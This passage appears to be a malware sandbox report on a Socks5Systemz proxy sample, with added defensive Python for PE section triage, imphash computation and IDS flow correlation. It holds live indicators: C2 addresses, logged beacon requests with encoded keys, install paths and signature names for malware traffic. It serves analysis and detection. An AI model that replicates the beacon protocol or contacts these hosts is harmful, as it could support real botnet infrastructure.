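IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

HIGH_ENTROPY = 7.0  # assumption: above this, raw bytes look compressed or encrypted


@dataclass(frozen=True)
class SectionHeader:
    name: str
    virtual_size: int
    virtual_address: int
    size_of_raw_data: int
    pointer_to_raw_data: int
    characteristics: int


def parse_section_header(raw: bytes) -> SectionHeader:
    """Decode one IMAGE_SECTION_HEADER; the name is NUL-padded, not NUL-terminated."""
    if len(raw) != SECTION_HEADER_SIZE:
        raise ValueError(f"expected {SECTION_HEADER_SIZE} bytes, got {len(raw)}")
    (name, vsize, vaddr, raw_size, raw_ptr, _relocs, _lines,
     _nrelocs, _nlines, chars) = struct.unpack(SECTION_HEADER_FMT, raw)
    return SectionHeader(name.rstrip(b"\0").decode("ascii", "replace"),
                         vsize, vaddr, raw_size, raw_ptr, chars)


def shannon_entropy_8bit(data: bytes) -> float:
    """The 'Entropy (8bit)' figure the report prints: 0.0 for empty or uniform data, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_findings(hdr: SectionHeader, raw_data: bytes) -> list[str]:
    """Triage checks applied to one section row; an empty list means nothing notable."""
    findings = []
    if hdr.characteristics & IMAGE_SCN_MEM_WRITE and hdr.characteristics & IMAGE_SCN_MEM_EXECUTE:
        findings.append("writable and executable (self-modifying or unpacking code)")
    if hdr.size_of_raw_data == 0 and hdr.virtual_size:
        findings.append("no raw data but non-zero virtual size (filled at runtime)")
    entropy = shannon_entropy_8bit(raw_data)
    if entropy >= HIGH_ENTROPY:
        findings.append(f"high entropy {entropy:.3f} (compressed or encrypted payload)")
    return findings


def make_header(name: bytes, vsize: int, vaddr: int, raw_size: int, raw_ptr: int, chars: int) -> bytes:
    """Build a header blob so the example runs without a PE file on disk."""
    return struct.pack(SECTION_HEADER_FMT, name.ljust(8, b"\0"), vsize, vaddr,
                       raw_size, raw_ptr, 0, 0, 0, 0, chars)


# Constructed from the .idata row of the section table (file offset 0xa400 is an assumption).
IDATA_HEADER = make_header(b".idata", 0x950, 0xd000, 0xa00, 0xa400,
                           IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)

# Constructed counter-example: a code section that is also writable.
RWX_HEADER = make_header(b".text", 0x1000, 0x1000, 0x1000, 0x400,
                         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)

# Constructed stand-in for a compressed payload: every byte value equally often, entropy exactly 8.0.
PACKED_LIKE_DATA = bytes(range(256)) * 16


if __name__ == "__main__":
    for blob, data in ((IDATA_HEADER, b"\0" * 0xa00), (RWX_HEADER, PACKED_LIKE_DATA)):
        hdr = parse_section_header(blob)
        print(hdr.name, hex(hdr.virtual_address), section_findings(hdr, data) or ["nothing notable"])
```

Run against the real file, `section_findings` would see `.idata` as writable data with a moderate entropy of 4.43, exactly as the table shows; the BSS, .tls and .reloc rows, which have no raw data, are the "filled at runtime" case. A section that trips the RWX check is what the "Detected unpacking (changes PE section rights)" signature in the overview is looking for at runtime.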
Name           RVA      Size   Type                                                            Language  Country        ZLIB Complexity
RT_ICON        0x11354  0x128  Device independent bitmap graphic, 16 x 32 x 4, image size 192  Dutch     Netherlands    0.5675675675675675
RT_ICON        0x1147c  0x568  Device independent bitmap graphic, 16 x 32 x 8, image size 320  Dutch     Netherlands    0.4486994219653179
RT_ICON        0x119e4  0x2e8  Device independent bitmap graphic, 32 x 64 x 4, image size 640  Dutch     Netherlands    0.4637096774193548
RT_ICON        0x11ccc  0x8a8  Device independent bitmap graphic, 32 x 64 x 8, image size 1152 Dutch     Netherlands    0.3935018050541516
RT_STRING      0x12574  0x2f2  data                                                                                     0.35543766578249336
RT_STRING      0x12868  0x30c  data                                                                                     0.3871794871794872
RT_STRING      0x12b74  0x2ce  data                                                                                     0.42618384401114207
RT_STRING      0x12e44  0x68   data                                                                                     0.75
RT_STRING      0x12eac  0xb4   data                                                                                     0.6277777777777778
RT_STRING      0x12f60  0xae   data                                                                                     0.5344827586206896
RT_RCDATA      0x13010  0x2c   data                                                                                     1.1818181818181819
RT_GROUP_ICON  0x1303c  0x3e   data                                                            English   United States  0.8387096774193549
RT_VERSION     0x1307c  0x4f4  data                                                            English   United States  0.2610410094637224
RT_MANIFEST    0x13570  0x5a4  XML 1.0 document, ASCII text, with CRLF line terminators        English   United States  0.42590027700831024
DLL           Import
kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll    MessageBoxA
oleaut32.dll  VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll  WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll    TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll  InitCommonControls
advapi32.dll  AdjustTokenPrivileges
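The Import Hash field in the file information above (884310b1928934402ea6fec1dbd3cf5e) is the imphash of this import table: each DLL name is lower-cased and stripped of its .dll/.ocx/.sys extension, every imported function is appended as `dll.function` in import-directory order, and the comma-joined string is MD5-hashed. As an added example, not Joe Sandbox's code, the block below applies that derivation to the import list transcribed from the table, and also maps a handful of the imports onto the behaviours the overview flags (shutdown via ExitWindowsEx, privilege adjustment via OpenProcessToken/LookupPrivilegeValueA/AdjustTokenPrivileges, VirtualProtect for the section-rights change). Two caveats: the value computed here matches the report only if the listing above preserves the on-disk import order, which the page does not guarantee, so the test checks the algorithm rather than that number; and imports by ordinal, which the reference implementation resolves through a name table, do not occur in this list and are not handled. The API-to-behaviour mapping is my own and is an assumption.

```python
"""Added example (not from the report): derive an import hash ('imphash') from a
PE import list, the way the Import Hash field above is produced, and map a few
imports onto the capabilities listed in the overview."""
import hashlib

# Import list transcribed from the report's DLL/Import table, in the order shown.
IMPORTS = [
    ("kernel32.dll", [
        "DeleteCriticalSection", "LeaveCriticalSection", "EnterCriticalSection", "InitializeCriticalSection",
        "VirtualFree", "VirtualAlloc", "LocalFree", "LocalAlloc", "WideCharToMultiByte", "TlsSetValue",
        "TlsGetValue", "MultiByteToWideChar", "GetModuleHandleA", "GetLastError", "GetCommandLineA",
        "WriteFile", "SetFilePointer", "SetEndOfFile", "RtlUnwind", "ReadFile", "RaiseException",
        "GetStdHandle", "GetFileSize", "GetSystemTime", "GetFileType", "ExitProcess", "CreateFileA",
        "CloseHandle"]),
    ("user32.dll", ["MessageBoxA"]),
    ("oleaut32.dll", ["VariantChangeTypeEx", "VariantCopyInd", "VariantClear", "SysStringLen",
                      "SysAllocStringLen"]),
    ("advapi32.dll", ["RegQueryValueExA", "RegOpenKeyExA", "RegCloseKey", "OpenProcessToken",
                      "LookupPrivilegeValueA"]),
    ("kernel32.dll", [
        "WriteFile", "VirtualQuery", "VirtualProtect", "VirtualFree", "VirtualAlloc", "Sleep",
        "SizeofResource", "SetLastError", "SetFilePointer", "SetErrorMode", "SetEndOfFile",
        "RemoveDirectoryA", "ReadFile", "LockResource", "LoadResource", "LoadLibraryA", "IsDBCSLeadByte",
        "GetWindowsDirectoryA", "GetVersionExA", "GetUserDefaultLangID", "GetSystemInfo",
        "GetSystemDefaultLCID", "GetProcAddress", "GetModuleHandleA", "GetModuleFileNameA",
        "GetLocaleInfoA", "GetLastError", "GetFullPathNameA", "GetFileSize", "GetFileAttributesA",
        "GetExitCodeProcess", "GetEnvironmentVariableA", "GetCurrentProcess", "GetCommandLineA",
        "GetACP", "InterlockedExchange", "FormatMessageA", "FindResourceA", "DeleteFileA",
        "CreateProcessA", "CreateFileA", "CreateDirectoryA", "CloseHandle"]),
    ("user32.dll", ["TranslateMessage", "SetWindowLongA", "PeekMessageA", "MsgWaitForMultipleObjects",
                    "MessageBoxA", "LoadStringA", "ExitWindowsEx", "DispatchMessageA", "DestroyWindow",
                    "CreateWindowExA", "CallWindowProcA", "CharPrevA"]),
    ("comctl32.dll", ["InitCommonControls"]),
    ("advapi32.dll", ["AdjustTokenPrivileges"]),
]

# Assumption: my own mapping of imported APIs to the behaviours the report's overview names.
CAPABILITY_HINTS = {
    "ExitWindowsEx": "shutdown / reboot the system",
    "OpenProcessToken": "adjusts its own token privileges",
    "LookupPrivilegeValueA": "adjusts its own token privileges",
    "AdjustTokenPrivileges": "adjusts its own token privileges",
    "CreateProcessA": "launches another program",
    "VirtualProtect": "changes memory page protection (unpacking)",
}


def imphash_string(imports) -> str:
    """The normalised 'dll.func,dll.func,...' string that gets hashed; order matters."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        base, dot, ext = lib.rpartition(".")
        if dot and ext in ("dll", "ocx", "sys"):
            lib = base
        parts.extend(f"{lib}.{func.lower()}" for func in funcs)
    return ",".join(parts)


def imphash(imports) -> str:
    """MD5 of the normalised import string, as a 32-character hex digest."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


def capability_hints(imports) -> dict[str, list[str]]:
    """Group the imports that back each flagged behaviour; unknown APIs are ignored."""
    seen: dict[str, set[str]] = {}
    for _dll, funcs in imports:
        for func in funcs:
            if func in CAPABILITY_HINTS:
                seen.setdefault(CAPABILITY_HINTS[func], set()).add(func)
    return {behaviour: sorted(apis) for behaviour, apis in seen.items()}


if __name__ == "__main__":
    print("imphash of the listed imports:", imphash(IMPORTS))
    for behaviour, apis in capability_hints(IMPORTS).items():
        print(f"{behaviour}: {', '.join(apis)}")
```

Because the hash covers the order as well as the names, reordering two imports or adding one dummy import changes it completely; treat an imphash match as a strong link between samples and a mismatch as no evidence at all.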
Language of compilation system  Country where language is spoken
Dutch                           Netherlands
English                         United States
Timestamp                        SID      Signature                                          Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-18T13:59:10.577867+0100  2028765  ET JA3 Hash - [Abuse.ch] Possible Dridex           3         192.168.2.4  49887        188.119.66.185  443        TCP
2024-12-18T13:59:11.506476+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49887        188.119.66.185  443        TCP
2024-12-18T13:59:16.363973+0100  2028765  ET JA3 Hash - [Abuse.ch] Possible Dridex           3         192.168.2.4  49904        188.119.66.185  443        TCP
2024-12-18T13:59:17.056119+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49904        188.119.66.185  443        TCP
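The alert table above and the per-packet list that follows describe the same traffic from two angles: two TLS sessions from the sandbox host to 188.119.66.185:443 (client ports 49887 and 49904), each tripping the JA3 hash rule and the downloader-header rule, and a third connection to 46.8.225.74:2024 that fires no rule at all, which is what the "Detected TCP or UDP traffic on non-standard ports" line in the overview refers to. As an added example, not Joe Sandbox's code, the following correlates the two tables into per-flow records so that the un-alerted flow stands out. The alert rows and a subset of the packet rows are transcribed from the report; the sandbox subnet and the list of ports treated as standard are assumptions.

```python
"""Added example (not from the report): fold the Suricata alerts and the packet
list into per-flow summaries and surface flows that carried traffic without
triggering any rule, plus servers listening on non-standard ports."""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass

# Assumption: the analysis VM lives in this subnet, so it is always the client side of a flow.
SANDBOX_LAN = ipaddress.ip_network("192.168.2.0/24")
# Assumption: server ports that would not be flagged on their own.
STANDARD_PORTS = {53, 80, 443}


@dataclass(frozen=True)
class Packet:
    ts: str
    sport: int
    dport: int
    src: str
    dst: str


@dataclass(frozen=True)
class Alert:
    ts: str
    sid: int
    signature: str
    severity: int
    src: str
    sport: int
    dst: str
    dport: int


# Rows transcribed from the report's alert table.
ALERTS = [
    Alert("2024-12-18T13:59:10.577867+0100", 2028765, "ET JA3 Hash - [Abuse.ch] Possible Dridex", 3,
          "192.168.2.4", 49887, "188.119.66.185", 443),
    Alert("2024-12-18T13:59:11.506476+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2,
          "192.168.2.4", 49887, "188.119.66.185", 443),
    Alert("2024-12-18T13:59:16.363973+0100", 2028765, "ET JA3 Hash - [Abuse.ch] Possible Dridex", 3,
          "192.168.2.4", 49904, "188.119.66.185", 443),
    Alert("2024-12-18T13:59:17.056119+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2,
          "192.168.2.4", 49904, "188.119.66.185", 443),
]

# A subset of rows from the report's TCP packet list: the opening packets of each connection.
PACKETS = [
    Packet("13:59:08.884258032", 49887, 443, "192.168.2.4", "188.119.66.185"),
    Packet("13:59:08.884345055", 443, 49887, "188.119.66.185", "192.168.2.4"),
    Packet("13:59:08.884437084", 49887, 443, "192.168.2.4", "188.119.66.185"),
    Packet("13:59:11.521347046", 49896, 2024, "192.168.2.4", "46.8.225.74"),
    Packet("13:59:11.641547918", 2024, 49896, "46.8.225.74", "192.168.2.4"),
    Packet("13:59:14.910294056", 49904, 443, "192.168.2.4", "188.119.66.185"),
    Packet("13:59:14.910351992", 443, 49904, "188.119.66.185", "192.168.2.4"),
]


def flow_key(src: str, sport: int, dst: str, dport: int) -> tuple:
    """Orient a packet or alert as (client_ip, client_port, server_ip, server_port)."""
    if ipaddress.ip_address(src) in SANDBOX_LAN:
        return (src, sport, dst, dport)
    return (dst, dport, src, sport)


def summarize_flows(packets, alerts) -> dict:
    """Per flow: packets sent out and received, and the set of alert SIDs that fired on it."""
    flows = defaultdict(lambda: {"out": 0, "in": 0, "sids": set()})
    for p in packets:
        key = flow_key(p.src, p.sport, p.dst, p.dport)
        flows[key]["out" if key[0] == p.src else "in"] += 1
    for a in alerts:
        flows[flow_key(a.src, a.sport, a.dst, a.dport)]["sids"].add(a.sid)
    return dict(flows)


def non_standard_servers(flows) -> list:
    """Distinct (server, port) pairs outside STANDARD_PORTS."""
    return sorted({(key[2], key[3]) for key in flows if key[3] not in STANDARD_PORTS})


def unalerted_flows(flows) -> list:
    """Flows that carried traffic but matched no IDS rule: the ones to pull out of the pcap by hand."""
    return sorted(key for key, info in flows.items() if not info["sids"])


if __name__ == "__main__":
    flows = summarize_flows(PACKETS, ALERTS)
    for key, info in sorted(flows.items()):
        print(key, info["out"], "out", info["in"], "in", "SIDs", sorted(info["sids"]) or "none")
    print("non-standard server ports:", non_standard_servers(flows))
    print("flows with no alert:", unalerted_flows(flows))
```

The point of keying on the oriented 4-tuple rather than on the alert's own direction is that Suricata reports the alerting packet's source and destination, which for a server response would be inverted relative to the client; orienting both tables the same way is what lets the two alert rows for port 49887 land on the same flow as its packets.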
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 18, 2024 13:59:08.884258032 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:08.884345055 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:08.884437084 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:08.901068926 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:08.901108027 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:10.577692032 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:10.577867031 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:10.638515949 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:10.638576984 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:10.639765978 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:10.639851093 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:10.643642902 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:10.687334061 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:11.506510973 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:11.506561041 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:11.506578922 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:11.506591082 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:11.506613970 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:11.506633997 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:11.520374060 CET  49887        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:11.520406008 CET  443          49887      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:11.521347046 CET  49896        2024       192.168.2.4     46.8.225.74
Dec 18, 2024 13:59:11.641547918 CET  2024         49896      46.8.225.74     192.168.2.4
Dec 18, 2024 13:59:11.641669989 CET  49896        2024       192.168.2.4     46.8.225.74
Dec 18, 2024 13:59:11.641755104 CET  49896        2024       192.168.2.4     46.8.225.74
Dec 18, 2024 13:59:11.761507988 CET  2024         49896      46.8.225.74     192.168.2.4
Dec 18, 2024 13:59:11.761590004 CET  49896        2024       192.168.2.4     46.8.225.74
Dec 18, 2024 13:59:11.881269932 CET  2024         49896      46.8.225.74     192.168.2.4
Dec 18, 2024 13:59:12.895978928 CET  2024         49896      46.8.225.74     192.168.2.4
Dec 18, 2024 13:59:12.939534903 CET  49896        2024       192.168.2.4     46.8.225.74
Dec 18, 2024 13:59:14.910294056 CET  49904        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:14.910351992 CET  443          49904      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:14.910422087 CET  49904        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:14.910841942 CET  49904        443        192.168.2.4     188.119.66.185
Dec 18, 2024 13:59:14.910861015 CET  443          49904      188.119.66.185  192.168.2.4
Dec 18, 2024 13:59:16.363851070 CET  443          49904      188.119.66.185  192.168.2.4
                                                                                      Dec 18, 2024 13:59:16.363972902 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:16.364506960 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:16.364511967 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:16.364682913 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:16.364687920 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:17.056241035 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:17.056313038 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:17.056349993 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:17.056400061 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:17.056431055 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:17.056488991 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:17.056596041 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:17.056612015 CET44349904188.119.66.185192.168.2.4
• 188.119.66.185

Session ID   Source IP      Source Port   Destination IP    Destination Port   PID    Process
0            192.168.2.4    49887         188.119.66.185    443                6172   C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                  Bytes transferred   Direction   Data
2024-12-18 12:59:10 UTC    283                 OUT         GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a HTTP/1.1
                                                           User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                           Host: 188.119.66.185
2024-12-18 12:59:11 UTC    200                 IN          HTTP/1.1 200 OK
                                                           Server: nginx/1.18.0 (Ubuntu)
                                                           Date: Wed, 18 Dec 2024 12:59:11 GMT
                                                           Content-Type: text/html; charset=UTF-8
                                                           Transfer-Encoding: chunked
                                                           Connection: close
                                                           X-Powered-By: PHP/7.4.33
2024-12-18 12:59:11 UTC    768                 IN          Data Raw: 32 66 34 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 62 32 30 62 36 62 36 39 30 38 36 33 65 34 38 61 36 33 62 64 62 38 34 37 35 64 63 32 63 31 66 64 34 30 33 63 32 64 31 36 30 35 34 65 37 31 38 63 33 34 32 37 61 32 61 37 33 38 61 62 32 31 35 66 39 61 64 34 30 64 63 38 36 62 31 63 65 33 35 36 62 64 33 66 34 35 35 64 62 39 37 66 32 34 66 64 64 64 33 39 66 35 35 61 63 62 64 66 35 63 35 30 61 31 64 63 36 64 35 30 37 30 30 64 63 33 32 32 36 30 37 64 32 33 32 38 39 64 65 64 33 39 34 35 64 34 38 63 32 37 39 33 31 65 37 64 66 30 30 34 62 36 65 31 34 37 37 64 33 66 31 31 30 37 66 62 33 66 32 35 66 61 65 65 65 65 30 35 35 61 32 36 61 63 37 63 65 32 30 65 62 66 31 63 34 65 65 35 34 31 33 38 66 35 32 39 39 33 65 61 66 33 34
                                                           Data Ascii: 2f48b723c68ee18403c660fbfe0384b20b6b690863e48a63bdb8475dc2c1fd403c2d16054e718c3427a2a738ab215f9ad40dc86b1ce356bd3f455db97f24fddd39f55acbdf5c50a1dc6d50700dc322607d23289ded3945d48c27931e7df004b6e1477d3f1107fb3f25faeeee055a26ac7ce20ebf1c4ee54138f52993eaf34


Session ID   Source IP      Source Port   Destination IP    Destination Port   PID    Process
1            192.168.2.4    49904         188.119.66.185    443                6172   C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                  Bytes transferred   Direction   Data
2024-12-18 12:59:16 UTC    291                 OUT         GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b HTTP/1.1
                                                           User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                           Host: 188.119.66.185
2024-12-18 12:59:17 UTC    200                 IN          HTTP/1.1 200 OK
                                                           Server: nginx/1.18.0 (Ubuntu)
                                                           Date: Wed, 18 Dec 2024 12:59:16 GMT
                                                           Content-Type: text/html; charset=UTF-8
                                                           Transfer-Encoding: chunked
                                                           Connection: close
                                                           X-Powered-By: PHP/7.4.33
2024-12-18 12:59:17 UTC    24                  IN          Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                           Data Ascii: e8b723663ec13250


                                                                                      Target ID:0
                                                                                      Start time:07:57:04
                                                                                      Start date:18/12/2024
                                                                                      Path:C:\Users\user\Desktop\newwork.exe.1.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\newwork.exe.1.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:3'314'669 bytes
                                                                                      MD5 hash:27B4FA67C0810BC212077971A00854EA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:1
                                                                                      Start time:07:57:04
                                                                                      Start date:18/12/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp" /SL5="$1041E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:706'560 bytes
                                                                                      MD5 hash:ED6A19AD054AD0172201AF725324781B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.3557131784.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:2
                                                                                      Start time:07:57:05
                                                                                      Start date:18/12/2024
                                                                                      Path:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                                                                                      Imagebase:0x400000
                                                                                      File size:3'193'465 bytes
                                                                                      MD5 hash:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.3557079797.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000000.1708594819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                        Execution Graph

                                                                                        Execution Coverage:21.5%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:2.4%
                                                                                        Total number of Nodes:1520
                                                                                        Total number of Limit Nodes:22
                                                                                        execution_graph 5444 407548 5445 407554 CloseHandle 5444->5445 5446 40755d 5444->5446 5445->5446 6681 402b48 RaiseException 5886 407749 5887 4076dc WriteFile 5886->5887 5893 407724 5886->5893 5888 4076e8 5887->5888 5889 4076ef 5887->5889 5890 40748c 35 API calls 5888->5890 5891 407700 5889->5891 5892 4073ec 34 API calls 5889->5892 5890->5889 5892->5891 5893->5886 5894 4077e0 5893->5894 5895 4078db InterlockedExchange 5894->5895 5897 407890 5894->5897 5896 4078e7 5895->5896 6682 40294a 6683 402952 6682->6683 6684 402967 6683->6684 6685 403554 4 API calls 6683->6685 6685->6683 6686 403f4a 6687 403f53 6686->6687 6688 403f5c 6686->6688 6690 403f07 6687->6690 6693 403f09 6690->6693 6691 403f3c 6691->6688 6695 403e9c 6693->6695 6696 403154 4 API calls 6693->6696 6700 403f3d 6693->6700 6713 403e9c 6693->6713 6694 403ef2 6698 402674 4 API calls 6694->6698 6695->6691 6695->6694 6701 403ea9 6695->6701 6704 403e8e 6695->6704 6696->6693 6703 403ecf 6698->6703 6700->6688 6702 402674 4 API calls 6701->6702 6701->6703 6702->6703 6703->6688 6705 403e4c 6704->6705 6706 403e62 6705->6706 6707 403e7b 6705->6707 6709 403e67 6705->6709 6708 403cc8 4 API calls 6706->6708 6710 402674 4 API calls 6707->6710 6708->6709 6711 403e78 6709->6711 6712 402674 4 API calls 6709->6712 6710->6711 6711->6694 6711->6701 6712->6711 6714 403ed7 6713->6714 6720 403ea9 6713->6720 6715 403ef2 6714->6715 6717 403e8e 4 API calls 6714->6717 6718 402674 4 API calls 6715->6718 6716 403ecf 6716->6693 6719 403ee6 6717->6719 6718->6716 6719->6715 6719->6720 6720->6716 6721 402674 4 API calls 6720->6721 6721->6716 6240 40ac4f 6241 40abc1 6240->6241 6242 4094d8 9 API calls 6241->6242 6244 40abed 6241->6244 6242->6244 6243 40ac06 6245 40ac1a 6243->6245 6246 40ac0f DestroyWindow 6243->6246 6244->6243 6247 40ac00 RemoveDirectoryA 6244->6247 6248 40ac42 6245->6248 6249 40357c 4 API calls 6245->6249 6246->6245 6247->6243 6250 40ac38 
